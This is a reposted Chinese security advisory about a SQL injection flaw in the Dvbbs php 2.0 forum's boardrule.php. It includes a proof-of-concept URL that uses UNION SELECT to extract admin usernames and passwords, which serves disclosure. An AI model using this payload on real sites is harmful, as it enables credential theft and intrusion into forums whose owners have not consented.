包罗万象--好东西要收藏--共享无限

受影响系统：
动网论坛 Dvbbs php 2.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 36282

DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。

DvBBS没有正确地过滤用户提交给boardrule.php模块的groupboardid参数，远程攻击者可以通过向论坛提交恶意参数请求执行SQL注入攻击。

<*来源：Securitylab.ir
 
  链接：http://marc.info/?l=bugtraq&m=125207676114405&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://site.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/

建议：
--------------------------------------------------------------------------------
厂商补丁：

动网论坛
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.dvbbs.net/

我的QQ空间

clsid

clsid　　先得说下GUID，它是Globally Unique Identifier的简称...